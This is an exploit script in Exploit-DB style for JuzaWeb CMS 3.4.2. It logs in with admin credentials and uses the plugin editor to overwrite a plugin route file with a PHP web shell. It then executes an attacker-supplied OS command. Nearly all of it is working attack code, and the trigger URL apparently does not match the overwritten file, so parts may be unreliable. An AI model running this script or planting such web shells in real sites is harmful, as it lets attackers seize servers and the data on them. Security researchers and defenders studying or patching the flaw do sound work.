# Exploit Title: JuzaWeb CMS 3.4.2 - Authenticated Remote Code Execution
# Date: 2026-01-10
# Exploit Author: Sardor Shoakbarov
# Author GitHub: https://github.com/TheDeepOpc
# Vendor Homepage: https://juzaweb.com/
# Software Link: https://github.com/juzaweb/
# CVE: N/A (Pending)

import requests
import argparse
from bs4 import BeautifulSoup

def run_exploit():
    parser = argparse.ArgumentParser(description='JuzaWeb Authenticated RCE')
    
    # Setting up the exact syntax you requested
    parser.add_argument('-u', '--url', help='Target URL (e.g. http://127.0.0.1:8000)', required=True)
    parser.add_argument('-user', '--username', help='Admin Username/Email', required=True)
    parser.add_argument('-p', '--password', help='Admin Password', required=True)
    parser.add_argument('-cmd', '--command', help='OS Command to execute (e.g. "ls", "id")', required=True)
    
    args = parser.parse_args()
    target = args.url.rstrip('/')
    session = requests.Session()

    print(f"[*] Targeting: {target}")

    # Step 1: Login
    login_url = f"{target}/admin-cp/login"
    try:
        get_login = session.get(login_url)
        soup = BeautifulSoup(get_login.text, 'html.parser')
        token = soup.find('input', {'name': '_token'})['value']
        
        login_data = {
            '_token': token,
            'email': args.username,
            'password': args.password
        }
        
        res = session.post(login_url, data=login_data)
        if "Dashboard" not in res.text:
            print("[-] Login failed. Check credentials.")
            return
        print("[+] Login Successful.")
    except Exception as e:
        print(f"[-] Error during login: {e}")
        return

    # Step 2: Inject Web Shell
    # Injecting system() into a plugin file as described in the report
    print("[*] Injecting payload into Plugin Editor...")
    editor_url = f"{target}/admin-cp/plugins/editor"
    shell_payload = "<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); die; } ?>"
    
    inject_data = {
        'file': 'src/routes/api.php', # File to overwrite
        'content': shell_payload,
        'plugin': 'juzaweb/example'  # Targeted plugin
    }
    
    session.post(editor_url, data=inject_data)

    # Step 3: Execute Command
    # Accessing the modified route to trigger the command
    print(f"[*] Executing command: {args.command}")
    exec_url = f"{target}/admin-cp/plugins?cmd={args.command}"
    response = session.get(exec_url)
    
    print("\n--- Output ---")
    print(response.text.strip())
    print("--------------")

if __name__ == "__main__":
    run_exploit()